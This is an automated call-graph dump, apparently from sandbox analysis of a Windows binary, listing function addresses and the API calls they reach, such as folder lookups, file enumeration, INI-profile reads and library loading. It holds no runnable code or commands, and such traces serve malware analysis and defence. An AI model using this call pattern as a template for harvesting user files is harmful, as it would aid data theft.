std::_Facet_Register 4 API calls 70131->70133 70134 10ce31 std::_Facet_Register 4 API calls 70132->70134 70138 978de 70133->70138 70134->70145 70136->70145 70140 9798e 70137->70140 70441 32830 70138->70441 70139 97860 70143 10ce31 std::_Facet_Register 4 API calls 70139->70143 70457 38ce0 RtlAllocateHeap ExitProcess RtlAllocateHeap RtlFreeHeap ___std_exception_copy 70140->70457 70143->70145 70144 979a1 Concurrency::cancel_current_task 70146 93c50 70145->70146 70484 97b50 70146->70484 70150 9d883 70149->70150 70155 9d8ae std::_Locinfo::_Locinfo_ctor 70149->70155 70151 9d890 70150->70151 70152 9d8dc 70150->70152 70153 9d8d3 70150->70153 70156 10ce31 std::_Facet_Register 4 API calls 70151->70156 70152->70155 70157 10ce31 std::_Facet_Register 4 API calls 70152->70157 70153->70151 70154 9d92d 70153->70154 70519 31fa0 4 API calls 2 library calls 70154->70519 70155->69556 70158 9d8a3 70156->70158 70157->70155 70158->70155 70160 112350 3 API calls 70158->70160 70161 9d937 70160->70161 70162 11b376 __freea 2 API calls 70161->70162 70163 9d954 70162->70163 70163->69556 70165 95e3a 70164->70165 70166 95e4b 70165->70166 70167 95ef2 70165->70167 70168 95e57 std::_Locinfo::_Locinfo_ctor 70166->70168 70170 95e7c 70166->70170 70172 95ebe 70166->70172 70173 95eb5 70166->70173 70169 32040 4 API calls 70167->70169 70168->69563 70171 95ef7 70169->70171 70175 10ce31 std::_Facet_Register 4 API calls 70170->70175 70520 31fa0 4 API calls 2 library calls 70171->70520 70178 10ce31 std::_Facet_Register 4 API calls 70172->70178 70179 95e96 std::_Locinfo::_Locinfo_ctor 70172->70179 70173->70170 70173->70171 70176 95e8f 70175->70176 70176->70179 70178->70179 70179->69563 70377 a2b18 70376->70377 70378 a2a4d 70376->70378 70379 32b90 4 API calls 70377->70379 71410 9eb90 70378->71410 70380 a2b1d 70379->70380 71438 10b28b 4 API calls 2 library calls 70406->71438 70436 10ce36 std::_Facet_Register 70433->70436 70435 10ce50 70435->70139 70436->70435 70438 31fa0 Concurrency::cancel_current_task 
70436->70438 70458 11bacc 70436->70458 70437 10ce5c 70437->70437 70438->70437 70464 10e1f1 70438->70464 70442 32846 70441->70442 70443 328f5 70441->70443 70445 32852 std::_Locinfo::_Locinfo_ctor 70442->70445 70446 3287a 70442->70446 70449 328b5 70442->70449 70450 328be 70442->70450 70444 32040 4 API calls 70443->70444 70447 328fa 70444->70447 70445->70145 70451 10ce31 std::_Facet_Register 4 API calls 70446->70451 70483 31fa0 4 API calls 2 library calls 70447->70483 70449->70446 70449->70447 70454 10ce31 std::_Facet_Register 4 API calls 70450->70454 70455 32896 std::_Locinfo::_Locinfo_ctor 70450->70455 70452 3288d 70451->70452 70453 112350 3 API calls 70452->70453 70452->70455 70456 32904 70453->70456 70454->70455 70455->70145 70457->70144 70463 1249cd __dosmaperr std::_Facet_Register 70458->70463 70459 124a0b 70472 11addf RtlAllocateHeap RtlFreeHeap __dosmaperr 70459->70472 70461 1249f6 RtlAllocateHeap 70462 124a09 70461->70462 70461->70463 70462->70436 70463->70459 70463->70461 70465 10e1fe 70464->70465 70471 31fe3 70464->70471 70466 11bacc ___std_exception_copy 3 API calls 70465->70466 70465->70471 70467 10e21b 70466->70467 70468 10e22b 70467->70468 70473 123258 ExitProcess RtlAllocateHeap RtlFreeHeap __fread_nolock __dosmaperr 70467->70473 70474 11b376 70468->70474 70471->70139 70472->70462 70473->70468 70477 124953 70474->70477 70478 12495e RtlFreeHeap 70477->70478 70481 11b38e 70477->70481 70479 124973 __dosmaperr 70478->70479 70478->70481 70482 11addf RtlAllocateHeap RtlFreeHeap __dosmaperr 70479->70482 70481->70471 70482->70481 70483->70452 70487 97b8a 70484->70487 70485 10ce31 std::_Facet_Register 4 API calls 70486 97bc0 70485->70486 70488 547af 70486->70488 70489 97ca9 70486->70489 70490 97c13 70486->70490 70487->70485 70488->69551 70514 32b90 70489->70514 70496 99540 70490->70496 70494 97c19 70494->70488 70495 93910 4 API calls 70494->70495 70495->70494 70497 9954d 70496->70497 70498 99591 70496->70498 70500 99557 70497->70500 70502 9957a 70497->70502 
70517 31fa0 4 API calls 2 library calls 70498->70517 70500->70498 70504 9955e 70500->70504 70501 9958b 70501->70494 70502->70501 70505 10ce31 std::_Facet_Register 4 API calls 70502->70505 70503 99564 70506 112350 3 API calls 70503->70506 70510 9956d 70503->70510 70507 10ce31 std::_Facet_Register 4 API calls 70504->70507 70508 99584 70505->70508 70509 9959b 70506->70509 70507->70503 70508->70494 70511 995c4 70509->70511 70512 112350 3 API calls 70509->70512 70510->70494 70511->70494 70513 995d9 70512->70513 70518 10b28b 4 API calls 2 library calls 70514->70518 70517->70503 70519->70158 70520->70176 71411 9eb9d 71410->71411 71412 9ebe4 71410->71412 71414 9ebaa 71411->71414 71415 9ebcd 71411->71415 71436 31fa0 4 API calls 2 library calls 71412->71436 71414->71412 71416 9ebb1 71414->71416 71417 9ebde 71415->71417 71420 10ce31 std::_Facet_Register 4 API calls 71415->71420 71418 9ebb7 71436->71418 71466 97810 4 API calls 71465->71466 71467 55ae3 71466->71467 71467->69612 71469 99c25 71468->71469 71469->71469 71470 99c5f 71469->71470 71471 99c3f 71469->71471 71472 32040 4 API calls 71470->71472 71473 9d850 4 API calls 71471->71473 71474 99c64 71472->71474 71475 55b9d 71473->71475 71475->69618 71475->69619 71477 99b70 71476->71477 71477->71477 71478 99b85 71477->71478 71479 99ba6 71477->71479 71485 95b90 4 API calls 71484->71485 71486 99d86 71485->71486 71486->69682 71578->69682 71579->69627 72205->69793 72207 11a9ea __fread_nolock 72206->72207 72224 1175da 72207->72224 72209 11aa04 72210 11207c __fread_nolock 3 API calls 72209->72210 72213 9d011 72212->72213 72214 9d05a 72213->72214 72215 9d0ff 72213->72215 72221 9d0c8 72213->72221 72217 10ce31 std::_Facet_Register 4 API calls 72214->72217 72255 37d60 RtlAllocateHeap ExitProcess RtlAllocateHeap RtlFreeHeap 72215->72255 72219 9d074 72217->72219 72218 9d104 72220 97810 4 API calls 72219->72220 72220->72221 72221->69810 72222->69810 72223->69810 72240 116559 72224->72240 72226 117635 72229 11765a 72226->72229 72248 1178b0 4 
API calls 2 library calls 72226->72248 72227 117602 72247 1122c3 ExitProcess RtlAllocateHeap RtlFreeHeap __fread_nolock __Getctype 72227->72247 72228 1175ed 72228->72226 72228->72227 72233 11761d 72228->72233 72249 116574 4 API calls 2 library calls 72229->72249 72233->72209 72241 116571 72240->72241 72242 11655e 72240->72242 72241->72228 72253 11addf RtlAllocateHeap RtlFreeHeap __dosmaperr 72242->72253 72244 116563 72254 112340 ExitProcess RtlAllocateHeap RtlFreeHeap __fread_nolock 72244->72254 72246 11656e 72246->72228 72247->72233 72248->72229 72253->72244 72254->72246 72255->72218 72257 95b20 4 API calls 72256->72257 72258 99bc6 72257->72258 72258->69900 72264->69900 72265->69828 72266->69845 72275 95e10 4 API calls 72274->72275 72276 60900 72275->72276 72277 3b8e0 9 API calls 72276->72277 72278 6090b 72277->72278 72279 10bc3e std::locale::_Init 4 API calls 72278->72279 72280 60983 72279->72280 72407 991d0 72280->72407 72398->70015 72401->70039 72402->70039 72403->70039 72405->70039 72409 99203 std::_Lockit::~_Lockit std::_Lockit::_Lockit 72407->72409 72853->70068 72854->70068 72857 8d180 72984 72250 72857->72984 72859 8d1e1 72859->72859 72860 8d238 72859->72860 72861 8ebd6 72859->72861 72862 9d850 4 API calls 72860->72862 72863 32040 4 API calls 72861->72863 72864 8d261 CreateDirectoryA 72862->72864 72865 8ebdb 72863->72865 72871 8de0f 72864->72871 72945 8d28c std::_Locinfo::_Locinfo_ctor __Mtx_unlock 72864->72945 72866 32040 4 API calls 72865->72866 72867 8ebe0 72866->72867 72870 112350 3 API calls 72867->72870 72868 8ea99 72869 8dde1 72872 95e10 4 API calls 72869->72872 72873 8ebe5 72870->72873 72874 8ea5f 72871->72874 72879 8de78 72871->72879 72880 8ec20 72871->72880 72885 8ddf2 72872->72885 74497 10c05c 8 API calls 2 library calls 72873->74497 72874->72868 72876 112350 3 API calls 72874->72876 72900 8ec74 72876->72900 72877 8ebeb 72878 32040 4 API calls 72877->72878 72881 8ebf0 72878->72881 72883 9d850 4 API calls 72879->72883 72882 32040 4 API calls 
72880->72882 72887 112350 3 API calls 72881->72887 72888 8ec25 72882->72888 72889 8dea1 CreateDirectoryA 72883->72889 72884 95e10 RtlAllocateHeap ExitProcess RtlAllocateHeap RtlFreeHeap 72884->72945 72885->72871 73573 3c050 72885->73573 72890 8ebf5 72887->72890 72891 32040 4 API calls 72888->72891 72902 8ea2c 72889->72902 72932 8dec6 std::_Locinfo::_Locinfo_ctor __Mtx_unlock 72889->72932 74498 10c05c 8 API calls 2 library calls 72890->74498 72893 8ec2a 72891->72893 72895 112350 3 API calls 72893->72895 72894 8ebfb 72899 32040 4 API calls 72894->72899 72901 8ec2f 72895->72901 72896 8ee15 72909 8eff2 72896->72909 72910 8ee66 72896->72910 72897 8e9fe 72898 95e10 4 API calls 72897->72898 72904 8ea0f 72898->72904 72905 8ec00 72899->72905 72900->72896 72906 8ed1a 72900->72906 72907 8efe3 72900->72907 74501 10c05c 8 API calls 2 library calls 72901->74501 72902->72874 72903 112350 3 API calls 72902->72903 72903->72874 73598 413c0 72904->73598 72912 112350 3 API calls 72905->72912 72914 9d850 4 API calls 72906->72914 72913 32040 4 API calls 72907->72913 72922 32040 4 API calls 72909->72922 72916 9d850 4 API calls 72910->72916 72918 8ec05 72912->72918 72919 8efe8 72913->72919 72920 8ed40 72914->72920 72915 8ec35 72921 32040 4 API calls 72915->72921 72924 8ee8c 72916->72924 74499 10c05c 8 API calls 2 library calls 72918->74499 72927 112350 3 API calls 72919->72927 72928 8ed7e 72920->72928 74505 a10f0 RtlAllocateHeap ExitProcess RtlAllocateHeap RtlFreeHeap 72920->74505 72929 8ec3a 72921->72929 72923 8ee9e 72922->72923 72930 112350 3 API calls 72923->72930 72957 8eed0 72923->72957 72931 95e10 4 API calls 72924->72931 72925 95b90 4 API calls 72925->72945 72936 8efed 72927->72936 74506 3c820 RtlAllocateHeap RtlAllocateHeap RtlFreeHeap __freea ___std_exception_copy 72928->74506 72937 112350 3 API calls 72929->72937 72938 8effc 72930->72938 72931->72923 72932->72888 72932->72893 72932->72897 72932->72901 72932->72915 72932->72929 72942 8ec3f 72932->72942 72948 8ec45 72932->72948 
72953 8ec4a 72932->72953 72956 9d850 RtlAllocateHeap ExitProcess RtlAllocateHeap RtlFreeHeap 72932->72956 72959 8ec4f 72932->72959 72961 95b90 4 API calls 72932->72961 72962 8ec55 72932->72962 72964 8ec5a 72932->72964 72966 8ec5f 72932->72966 72968 8ec65 72932->72968 72975 9bc40 RtlAllocateHeap ExitProcess RtlAllocateHeap RtlFreeHeap 72932->72975 72976 32830 4 API calls 72932->72976 72978 9d660 4 API calls 72932->72978 72980 10c3b3 GetSystemTimePreciseAsFileTime 72932->72980 72982 95e10 RtlAllocateHeap ExitProcess RtlAllocateHeap RtlFreeHeap 72932->72982 72983 3f050 14 API calls 72932->72983 74496 959f0 4 API calls 3 library calls 72932->74496 72935 8ec0b 72939 112350 3 API calls 72935->72939 72940 112350 3 API calls 72936->72940 72937->72942 72946 8ec10 72939->72946 72940->72909 74502 10c05c 8 API calls 2 library calls 72942->74502 72943 8edaa 72943->72919 72947 8eddd 72943->72947 72945->72865 72945->72867 72945->72869 72945->72873 72945->72877 72945->72881 72945->72884 72945->72890 72945->72894 72945->72905 72945->72918 72945->72925 72945->72935 72945->72946 72951 8ec15 72945->72951 72954 8ec1b 72945->72954 72970 32830 4 API calls 72945->72970 72971 9bc40 RtlAllocateHeap ExitProcess RtlAllocateHeap RtlFreeHeap 72945->72971 72972 10c3b3 GetSystemTimePreciseAsFileTime 72945->72972 72973 9d850 RtlAllocateHeap ExitProcess RtlAllocateHeap RtlFreeHeap 72945->72973 72974 9d660 4 API calls 72945->72974 74324 959f0 4 API calls 3 library calls 72945->74324 74325 3f050 72945->74325 72949 32040 4 API calls 72946->72949 72947->72896 72947->72936 72950 32040 4 API calls 72948->72950 72949->72951 72950->72953 74500 10c05c 8 API calls 2 library calls 72951->74500 72955 112350 3 API calls 72953->72955 72958 112350 3 API calls 72954->72958 72955->72959 72956->72932 72958->72880 74503 10c05c 8 API calls 2 library calls 72959->74503 72961->72932 72963 112350 3 API calls 72962->72963 72963->72964 72965 32040 4 API calls 72964->72965 72965->72966 74504 10c05c 8 API calls 2 library 
calls 72966->74504 72969 112350 3 API calls 72968->72969 72969->72902 72970->72945 72971->72945 72972->72945 72973->72945 72974->72945 72975->72932 72976->72932 72978->72932 72980->72932 72982->72932 72983->72932 72985 72272 72984->72985 72986 99b50 4 API calls 72985->72986 72987 72620 72985->72987 72989 722cd 72986->72989 72990 99b50 4 API calls 72987->72990 72991 73b3e 72987->72991 72988 74f1f 72988->72859 72995 722de CreateDirectoryA 72989->72995 72992 72655 72990->72992 72993 99b50 4 API calls 72991->72993 72994 74cf6 72991->72994 73000 7266a CreateDirectoryA 72992->73000 72996 73b8f 72993->72996 72994->72988 72997 99b50 4 API calls 72994->72997 72998 7260e 72995->72998 72999 722ea 72995->72999 73004 73ba4 CreateDirectoryA 72996->73004 73001 74d29 72997->73001 73005 32660 3 API calls 72998->73005 73011 99b50 4 API calls 72999->73011 73002 72677 73000->73002 73003 73b2c 73000->73003 73008 74d3e CreateDirectoryA 73001->73008 73015 99b50 4 API calls 73002->73015 73009 32660 3 API calls 73003->73009 73006 74ce4 73004->73006 73007 73bb1 73004->73007 73005->72987 73010 32660 3 API calls 73006->73010 73018 99b50 4 API calls 73007->73018 73012 74f14 73008->73012 73013 74d4b 73008->73013 73009->72991 73010->72994 73014 72328 73011->73014 73016 32660 3 API calls 73012->73016 73019 99b50 4 API calls 73013->73019 73020 7233b CreateDirectoryA 73014->73020 73017 726b6 73015->73017 73016->72988 73025 726ca CreateDirectoryA 73017->73025 73021 73bec 73018->73021 73022 74d87 73019->73022 73023 72447 73020->73023 73024 7234c __fread_nolock 73020->73024 73028 73bfe CreateDirectoryA 73021->73028 73029 74d99 CreateDirectoryA 73022->73029 73034 99b50 4 API calls 73023->73034 73030 7235e SHGetFolderPathA 73024->73030 73026 726d5 73025->73026 73027 7282a 73025->73027 73036 32700 4 API calls 73026->73036 73038 99b50 4 API calls 73027->73038 73031 73d2e 73028->73031 73032 73c0b 73028->73032 73033 74ef3 73029->73033 73066 74da6 73029->73066 73035 72398 73030->73035 73044 99b50 4 API calls 
73031->73044 73041 32700 4 API calls 73032->73041 73037 3c050 13 API calls 73033->73037 73042 74f06 73033->73042 73039 72479 73034->73039 73040 32700 4 API calls 73035->73040 73055 7270b 73036->73055 73037->73042 73043 72865 73038->73043 73046 7248d CreateDirectoryA 73039->73046 73045 723a4 73040->73045 73064 73c5c 73041->73064 73049 32660 3 API calls 73042->73049 73050 72879 CreateDirectoryA 73043->73050 73047 73d6e 73044->73047 73048 99c70 4 API calls 73045->73048 73051 725e0 73046->73051 73052 72498 __fread_nolock 73046->73052 73053 73d80 CreateDirectoryA 73047->73053 73054 723ba 73048->73054 73049->73012 73057 72884 73050->73057 73058 72c93 73050->73058 73056 725f5 73051->73056 73063 3c050 13 API calls 73051->73063 73059 724ab SHGetFolderPathA 73052->73059 73060 73d8d 73053->73060 73061 73e98 73053->73061 73062 32660 3 API calls 73054->73062 73069 99c70 4 API calls 73055->73069 73065 32660 3 API calls 73056->73065 73076 32700 4 API calls 73057->73076 73075 99b50 4 API calls 73058->73075 73067 724eb 73059->73067 73078 32700 4 API calls 73060->73078 73082 99b50 4 API calls 73061->73082 73068 723cc 73062->73068 73063->73056 73073 99c70 4 API calls 73064->73073 73070 72603 73065->73070 73071 32830 4 API calls 73066->73071 73077 32700 4 API calls 73067->73077 74507 3bf90 73068->74507 73072 7275a 73069->73072 73074 32660 3 API calls 73070->73074 73088 74e1c 73071->73088 73079 32660 3 API calls 73072->73079 73080 73c9f 73073->73080 73074->72998 73081 72cce 73075->73081 73093 728c5 73076->73093 73084 724f7 73077->73084 73104 73dc6 73078->73104 73086 7276c 73079->73086 73087 32660 3 API calls 73080->73087 73092 72ce2 CreateDirectoryA 73081->73092 73083 73ec2 73082->73083 73094 73ed4 CreateDirectoryA 73083->73094 73089 99c70 4 API calls 73084->73089 73106 32700 4 API calls 73086->73106 73091 73cb1 73087->73091 73099 99c70 4 API calls 73088->73099 73095 7250d 73089->73095 73090 723de 73113 3bf90 10 API calls 73091->73113 73097 72e60 73092->73097 73098 72ced 73092->73098 
73108 99c70 4 API calls 73093->73108 73100 73ee1 73094->73100 73101 73fee 73094->73101 73103 32660 3 API calls 73095->73103 73117 99b50 4 API calls 73097->73117 73114 32700 4 API calls 73098->73114 73107 74e69 73099->73107 73126 32700 4 API calls 73100->73126 73123 99b50 4 API calls 73101->73123 73110 7251f 73103->73110 73118 99c70 4 API calls 73104->73118 73112 72784 73106->73112 73115 32660 3 API calls 73107->73115 73116 72908 73108->73116 73138 32700 4 API calls 73110->73138 73120 3bf00 7 API calls 73112->73120 73121 73cc3 73113->73121 73150 72d42 73114->73150 73124 74e7b 73115->73124 73125 32660 3 API calls 73116->73125 73128 72ea5 73117->73128 73129 73e09 73118->73129 73145 72789 73120->73145 73122 73d00 73121->73122 73136 95e10 4 API calls 73121->73136 73137 3c050 13 API calls 73122->73137 73142 73d07 73122->73142 73133 7402c 73123->73133 73147 3bf90 10 API calls 73124->73147 73134 7291a 73125->73134 73159 73f1c 73126->73159 73143 72eb9 CreateDirectoryA 73128->73143 73135 32660 3 API calls 73129->73135 73132 727ff 73140 3c050 13 API calls 73132->73140 73148 72803 73132->73148 73146 7403e CreateDirectoryA 73133->73146 73158 32700 4 API calls 73134->73158 73139 73e1b 73135->73139 73141 73cdf 73136->73141 73137->73142 73144 72537 73138->73144 73165 3bf90 10 API calls 73139->73165 73140->73148 73149 95e10 4 API calls 73141->73149 73161 32660 3 API calls 73142->73161 73151 72ec4 73143->73151 73152 7301b 73143->73152 73145->73132 73154 99b50 4 API calls 73145->73154 73155 7404b 73146->73155 73156 74718 73146->73156 73157 74e8d 73147->73157 73166 32660 3 API calls 73148->73166 73160 73cf4 73149->73160 73168 99c70 4 API calls 73150->73168 73169 99b50 4 API calls 73152->73169 73189 727d1 73154->73189 73163 74ec7 73157->73163 73170 95e10 4 API calls 73157->73170 73164 72932 73158->73164 73172 99c70 4 API calls 73159->73172 73161->73031 73174 3c050 13 API calls 73163->73174 73185 74ece 73163->73185 73171 3bf00 7 API calls 73164->73171 73175 73e2d 73165->73175 
73166->73027 73176 72d85 73168->73176 73182 74ea7 73170->73182 73183 73f5f 73172->73183 73174->73185 73187 32660 3 API calls 73176->73187 73201 32660 3 API calls 73185->73201 73221 32660 3 API calls 73189->73221 73201->73033 73221->73132 73574 10c3b3 GetSystemTimePreciseAsFileTime 73573->73574 73575 3c083 73574->73575 73576 3c412 73575->73576 73577 3c08e 73575->73577 74637 10c05c 8 API calls 2 library calls 73576->74637 73578 3c418 73577->73578 73581 9d850 4 API calls 73577->73581 73580 32040 4 API calls 73578->73580 73587 3c336 73580->73587 73582 3c0ec FindFirstFileA 73581->73582 73582->73587 73592 3c15c 73582->73592 73583 112350 3 API calls 73585 3c422 73583->73585 73586 3c3d7 __Mtx_unlock 73586->72871 73587->73583 73587->73586 73588 9d850 4 API calls 73588->73592 73589 95b20 4 API calls 73589->73592 73590 95c90 3 API calls 73590->73592 73591 3c050 9 API calls 73591->73592 73592->73578 73592->73587 73592->73588 73592->73589 73592->73590 73592->73591 73593 3c2f1 FindNextFileA 73592->73593 73593->73592 73594 3c308 73593->73594 73594->73587 73595 3c326 SetFileAttributesA 73594->73595 73595->73587 74638 10f090 73598->74638 73600 413fd SHGetFolderPathA 73601 10f090 __fread_nolock 73600->73601 73602 4142a SHGetFolderPathA 73601->73602 74324->72945 74326 3f0d6 74325->74326 74327 3f654 74326->74327 74329 9d850 4 API calls 74326->74329 74328 32040 4 API calls 74327->74328 74330 3f659 74328->74330 74380 3f129 __Mtx_unlock 74329->74380 75490 10c05c 8 API calls 2 library calls 74330->75490 74332 112350 3 API calls 74334 3f664 __fread_nolock 74332->74334 74333 9d850 RtlAllocateHeap ExitProcess RtlAllocateHeap RtlFreeHeap 74333->74380 74337 32830 4 API calls 74334->74337 74335 3f638 74335->72945 74336 95c90 ExitProcess RtlAllocateHeap RtlFreeHeap 74336->74380 74338 3f739 74337->74338 74339 99c70 4 API calls 74338->74339 74340 3f74f 74339->74340 74341 3f780 74340->74341 74344 404a5 74340->74344 74343 10c3b3 GetSystemTimePreciseAsFileTime 74341->74343 74342 95b20 RtlAllocateHeap 
BaseDllReadWriteIniFile 77548->77557 77558 4d40bfa BaseDllReadWriteIniFile 77548->77558 77559 4d40b4b BaseDllReadWriteIniFile 77548->77559 77856 cdee0 RtlAllocateHeap RtlAllocateHeap RtlFreeHeap 77548->77856 77857 ce0f0 RtlAllocateHeap RtlAllocateHeap RtlFreeHeap 77548->77857 77549->77548 77550->77548 77551->77548 77552->77548 77553->77548 77554->77548 77555->77548 77556->77548 77557->77548 77558->77548 77559->77548 77560->77548 77561->77548 77562->77548 77563->77548 77564->77548 77565->77548 77566->77548 77567->77548 77568->77548 77570 68cc6 77569->77570 77571 97810 4 API calls 77570->77571 77572 68ceb 77571->77572 77573 93c50 4 API calls 77572->77573 77574 68d13 77573->77574 77575 99ec0 4 API calls 77574->77575 77576 68d4d __fread_nolock 77575->77576 77576->77576 77577 6a68a 77576->77577 77578 9d850 4 API calls 77576->77578 77579 32040 4 API calls 77577->77579 77582 68e05 77578->77582 77580 6a68f 77579->77580 77581 32040 4 API calls 77580->77581 77595 6a5b6 77581->77595 77582->77580 77582->77582 77585 9d850 4 API calls 77582->77585 77583 112350 3 API calls 77584 6a699 77583->77584 77587 32700 4 API calls 77584->77587 77586 68e98 77585->77586 77633 4d90e8b GetPrivateProfileStringA 77586->77633 77634 4d90ecf GetPrivateProfileStringA 77586->77634 77635 4d90f40 GetPrivateProfileStringA 77586->77635 77636 4d90e82 GetPrivateProfileStringA 77586->77636 77637 4d90ee5 GetPrivateProfileStringA 77586->77637 77638 4d90e85 GetPrivateProfileStringA 77586->77638 77639 4d90ea5 GetPrivateProfileStringA 77586->77639 77640 4d90f54 GetPrivateProfileStringA 77586->77640 77641 4d90e56 2 API calls 77586->77641 77588 6a6b0 77587->77588 77589 99c70 4 API calls 77588->77589 77590 6a6c5 77589->77590 77591 38920 4 API calls 77590->77591 77592 6a6dd Concurrency::cancel_current_task 77591->77592 77593 11a68e 4 API calls 77621 68eca __fread_nolock 77593->77621 77594 6a667 77594->77316 77595->77583 77595->77594 77596 9d850 RtlAllocateHeap ExitProcess RtlAllocateHeap RtlFreeHeap 77596->77621 
77597 95b20 4 API calls 77597->77621 77598 95e10 RtlAllocateHeap ExitProcess RtlAllocateHeap RtlFreeHeap 77598->77621 77599 3c430 RtlAllocateHeap ExitProcess RtlAllocateHeap RtlFreeHeap 77599->77621 77600 112f00 3 API calls 77600->77621 77601 116788 7 API calls 77601->77621 77602 98000 RtlAllocateHeap ExitProcess RtlAllocateHeap RtlFreeHeap RtlAllocateHeap 77602->77621 77603 959f0 RtlAllocateHeap ExitProcess RtlAllocateHeap RtlFreeHeap 77603->77621 77604 93c50 4 API calls 77604->77621 77605 979e0 4 API calls 77605->77621 77606 44540 14 API calls 77606->77621 77607 f27b0 3 API calls 77607->77621 77608 93230 RtlAllocateHeap ExitProcess RtlAllocateHeap RtlFreeHeap 77608->77621 77609 44970 10 API calls 77609->77621 77610 cf0e0 RtlAllocateHeap RtlAllocateHeap RtlFreeHeap 77610->77621 77611 97810 RtlAllocateHeap ExitProcess RtlAllocateHeap RtlFreeHeap 77611->77621 77614 cbfb0 RtlAllocateHeap RtlAllocateHeap RtlFreeHeap 77614->77621 77615 99ec0 RtlAllocateHeap ExitProcess RtlAllocateHeap RtlFreeHeap 77615->77621 77616 11a9d6 4 API calls 77616->77621 77617 bda80 RtlAllocateHeap RtlAllocateHeap RtlFreeHeap 77617->77621 77618 10ce31 RtlAllocateHeap ExitProcess RtlAllocateHeap RtlFreeHeap std::_Facet_Register 77618->77621 77619 32830 RtlAllocateHeap ExitProcess RtlAllocateHeap RtlFreeHeap 77619->77621 77620 93510 4 API calls 77620->77621 77621->77577 77621->77584 77621->77593 77621->77595 77621->77596 77621->77597 77621->77598 77621->77599 77621->77600 77621->77601 77621->77602 77621->77603 77621->77604 77621->77605 77621->77606 77621->77607 77621->77608 77621->77609 77621->77610 77621->77611 77621->77614 77621->77615 77621->77616 77621->77617 77621->77618 77621->77619 77621->77620 77622 4d40bd4 BaseDllReadWriteIniFile 77621->77622 77623 4d40be4 BaseDllReadWriteIniFile 77621->77623 77624 4d40ba5 BaseDllReadWriteIniFile 77621->77624 77625 4d40b67 BaseDllReadWriteIniFile 77621->77625 77626 4d40ae2 BaseDllReadWriteIniFile 77621->77626 77627 4d40bf2 BaseDllReadWriteIniFile 
77621->77627 77628 4d40b13 BaseDllReadWriteIniFile 77621->77628 77629 4d40b2e BaseDllReadWriteIniFile 77621->77629 77630 4d40b78 BaseDllReadWriteIniFile 77621->77630 77631 4d40bfa BaseDllReadWriteIniFile 77621->77631 77632 4d40b4b BaseDllReadWriteIniFile 77621->77632 77859 cdee0 RtlAllocateHeap RtlAllocateHeap RtlFreeHeap 77621->77859 77860 ce0f0 RtlAllocateHeap RtlAllocateHeap RtlFreeHeap 77621->77860 77622->77621 77623->77621 77624->77621 77625->77621 77626->77621 77627->77621 77628->77621 77629->77621 77630->77621 77631->77621 77632->77621 77633->77621 77634->77621 77635->77621 77636->77621 77637->77621 77638->77621 77639->77621 77640->77621 77641->77621 77643 6a736 77642->77643 77644 97810 4 API calls 77643->77644 77645 6a75b 77644->77645 77646 93c50 4 API calls 77645->77646 77647 6a783 77646->77647 77648 99ec0 4 API calls 77647->77648 77649 6a7bc __fread_nolock 77648->77649 77649->77649 77650 6b98f 77649->77650 77652 9d850 4 API calls 77649->77652 77651 32040 4 API calls 77650->77651 77653 6b994 77651->77653 77656 6a874 77652->77656 77654 32040 4 API calls 77653->77654 77669 6b8bb 77654->77669 77655 112350 3 API calls 77657 6b99e 77655->77657 77656->77653 77656->77656 77658 9d850 4 API calls 77656->77658 77659 32700 4 API calls 77657->77659 77660 6a8ff 77658->77660 77661 6b9b5 77659->77661 77698 4d90e8b GetPrivateProfileStringA 77660->77698 77699 4d90ecf GetPrivateProfileStringA 77660->77699 77700 4d90f40 GetPrivateProfileStringA 77660->77700 77701 4d90e82 GetPrivateProfileStringA 77660->77701 77702 4d90ee5 GetPrivateProfileStringA 77660->77702 77703 4d90e85 GetPrivateProfileStringA 77660->77703 77704 4d90ea5 GetPrivateProfileStringA 77660->77704 77705 4d90f54 GetPrivateProfileStringA 77660->77705 77706 4d90e56 2 API calls 77660->77706 77662 99c70 4 API calls 77661->77662 77663 6b9ca 77662->77663 77664 38920 4 API calls 77663->77664 77666 6b9e2 Concurrency::cancel_current_task 77664->77666 77665 11a68e 4 API calls 77696 6a931 __fread_nolock 
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 77665->77696 77667 6ba3e LoadLibraryA 77666->77667 77678 6ba5c 77666->77678 77667->77678 77668 6b96c 77668->77316 77669->77655 77669->77668 77670 9d850 RtlAllocateHeap ExitProcess RtlAllocateHeap RtlFreeHeap 77670->77696 77671 95e10 RtlAllocateHeap ExitProcess RtlAllocateHeap RtlFreeHeap 77671->77696 77672 112f00 3 API calls 77672->77696 77673 3c430 RtlAllocateHeap ExitProcess RtlAllocateHeap RtlFreeHeap 77673->77696 77674 116788 7 API calls 77674->77696 77675 98000 RtlAllocateHeap ExitProcess RtlAllocateHeap RtlFreeHeap RtlAllocateHeap 77675->77696 77676 959f0 RtlAllocateHeap ExitProcess RtlAllocateHeap RtlFreeHeap 77676->77696 77677 93c50 4 API calls 77677->77696 77678->77316 77679 10ce31 RtlAllocateHeap ExitProcess RtlAllocateHeap RtlFreeHeap std::_Facet_Register 77679->77696 77680 979e0 4 API calls 77680->77696 77681 44540 14 API calls 77681->77696 77682 99ec0 RtlAllocateHeap ExitProcess RtlAllocateHeap RtlFreeHeap 77682->77696 77683 f27b0 RtlAllocateHeap RtlAllocateHeap RtlFreeHeap 77683->77696 77684 93230 RtlAllocateHeap ExitProcess RtlAllocateHeap RtlFreeHeap 77684->77696 77685 44970 10 API calls 77685->77696 77688 cbfb0 RtlAllocateHeap RtlAllocateHeap RtlFreeHeap 77688->77696 77689 32830 RtlAllocateHeap ExitProcess RtlAllocateHeap RtlFreeHeap 77689->77696 77690 99c70 4 API calls 77690->77696 77691 95b20 RtlAllocateHeap ExitProcess RtlAllocateHeap RtlFreeHeap 77691->77696 77692 bda80 RtlAllocateHeap RtlAllocateHeap RtlFreeHeap 77692->77696 77693 97810 RtlAllocateHeap ExitProcess RtlAllocateHeap RtlFreeHeap 77693->77696 77694 11a9d6 4 API calls 77694->77696 77695 93510 4 API calls 77695->77696 77696->77650 77696->77657 77696->77665 77696->77669 77696->77670 77696->77671 77696->77672 77696->77673 77696->77674 77696->77675 77696->77676 77696->77677 77696->77679 77696->77680 77696->77681 77696->77682 77696->77683 77696->77684 77696->77685 77696->77688 77696->77689 77696->77690 77696->77691 77696->77692 77696->77693 
